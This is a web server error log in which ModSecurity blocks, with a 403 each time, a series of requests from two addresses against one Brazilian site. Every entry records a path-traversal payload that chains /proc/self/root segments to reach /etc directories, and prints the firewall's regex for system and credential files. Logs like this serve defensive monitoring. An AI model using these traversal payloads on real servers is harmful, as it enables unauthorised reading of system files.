[Mon Mar 16 08:18:28.750039 2026] [:error] [pid 21946:tid 140411741927168] [client 74.7.241.46:42864] [client 74.7.241.46] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/etc/logrotate.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abfnBHbQATo66fKoS7wuaAAAAMA"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/etc
[Mon Mar 16 08:18:33.204346 2026] [:error] [pid 21806:tid 140411540502272] [client 74.7.241.46:42868] [client 74.7.241.46] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc/kernel"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abfnCdSswJuvopo3lOhE9gAAAJg"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc
[Mon Mar 16 08:18:33.393823 2026] [:error] [pid 10709:tid 140411599251200] [client 74.7.243.203:58812] [client 74.7.243.203] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc/httpd"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abfnCRXjF1vJNtV6CWrezQAAAdE"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc
[Mon Mar 16 08:18:35.586833 2026] [:error] [pid 11972:tid 140411557287680] [client 74.7.241.46:42884] [client 74.7.241.46] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc/postfix"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abfnC5qj1wV0Si-OkefNUgAAABY"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc
[Mon Mar 16 08:18:35.672288 2026] [:error] [pid 10651:tid 140411691570944] [client 74.7.243.203:47916] [client 74.7.243.203] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc/statetab.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abfnC7ysWC90G-1nBrAqOAAAAYY"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc
[Mon Mar 16 08:18:37.013284 2026] [:error] [pid 21806:tid 140411691570944] [client 74.7.243.203:47928] [client 74.7.243.203] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc/ipmi"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abfnDdSswJuvopo3lOhE-AAAAIY"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc
[Mon Mar 16 08:18:41.559111 2026] [:error] [pid 10831:tid 140411674785536] [client 74.7.243.203:47936] [client 74.7.243.203] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc/cron.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abfnEY6lpbStxTqkSktRnAAAAkg"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc
[Mon Mar 16 08:18:43.347003 2026] [:error] [pid 10709:tid 140411666392832] [client 74.7.241.46:42892] [client 74.7.241.46] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/etc/lldpd.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abfnExXjF1vJNtV6CWre2QAAAck"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/etc
[Mon Mar 16 08:18:43.954411 2026] [:error] [pid 10709:tid 140411540502272] [client 74.7.243.203:50166] [client 74.7.243.203] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/etc/plymouth"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abfnExXjF1vJNtV6CWre2gAAAdg"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/etc
[Mon Mar 16 08:18:49.451494 2026] [:error] [pid 32654:tid 140411691570944] [client 74.7.243.203:50182] [client 74.7.243.203] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/etc/depmod.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abfnGQlT9VtDQc7bgUyMAwAAAQY"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/etc
[Mon Mar 16 08:18:51.191402 2026] [:error] [pid 21806:tid 140411733534464] [client 74.7.241.46:50370] [client 74.7.241.46] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc/sysctl.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abfnG9SswJuvopo3lOhFAQAAAIE"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc
[Mon Mar 16 08:18:54.515272 2026] [:error] [pid 11972:tid 140411683178240] [client 74.7.243.203:40098] [client 74.7.243.203] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc/systemd"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abfnHpqj1wV0Si-OkefNXQAAAAc"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc
[Mon Mar 16 08:19:01.613594 2026] [:error] [pid 32654:tid 140411590858496] [client 74.7.243.203:40108] [client 74.7.243.203] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc/terminfo"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abfnJQlT9VtDQc7bgUyMCgAAARI"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc
[Mon Mar 16 08:19:08.483723 2026] [:error] [pid 32654:tid 140411683178240] [client 74.7.243.203:49970] [client 74.7.243.203] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/etc/modprobe.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abfnLAlT9VtDQc7bgUyMDgAAAQc"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/etc
[Mon Mar 16 08:19:09.577883 2026] [:error] [pid 11972:tid 140411590858496] [client 74.7.241.46:44114] [client 74.7.241.46] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc/avahi"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abfnLZqj1wV0Si-OkefNbQAAABI"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc
[Mon Mar 16 08:19:22.183231 2026] [:error] [pid 32654:tid 140411574073088] [client 74.7.243.203:49972] [client 74.7.243.203] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/etc/terminfo"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abfnOglT9VtDQc7bgUyMKQAAARQ"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/etc
[Mon Mar 16 08:19:30.057431 2026] [:error] [pid 32654:tid 140411683178240] [client 74.7.241.46:53386] [client 74.7.241.46] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc/xdg"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abfnQglT9VtDQc7bgUyMMgAAAQc"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc
[Mon Mar 16 08:19:34.295704 2026] [:error] [pid 10772:tid 140411624429312] [client 74.7.243.203:42858] [client 74.7.243.203] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc/ssl"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abfnRv9ocpUE4ed4uDzS0wAAAg4"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc
[Mon Mar 16 08:19:37.491614 2026] [:error] [pid 10831:tid 140411666392832] [client 74.7.241.46:48026] [client 74.7.241.46] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc/telegraf"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abfnSY6lpbStxTqkSktRqgAAAkk"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc
[Mon Mar 16 08:19:38.884705 2026] [:error] [pid 10651:tid 140411574073088] [client 74.7.241.46:39364] [client 74.7.241.46] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/etc/ssl"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abfnSrysWC90G-1nBrAqSQAAAZQ"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/etc
[Mon Mar 16 08:19:40.275628 2026] [:error] [pid 10709:tid 140411599251200] [client 74.7.241.46:39376] [client 74.7.241.46] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/etc/gcrypt"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abfnTBXjF1vJNtV6CWre5gAAAdE"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/etc
[Mon Mar 16 08:19:48.257984 2026] [:error] [pid 11972:tid 140411741927168] [client 74.7.243.203:39448] [client 74.7.243.203] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/etc/rwtab.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abfnVJqj1wV0Si-OkefNgQAAAAA"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/etc
[Mon Mar 16 08:19:48.340211 2026] [:error] [pid 21946:tid 140411733534464] [client 74.7.241.46:39384] [client 74.7.241.46] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/etc/pm"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abfnVHbQATo66fKoS7wufAAAAME"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/etc
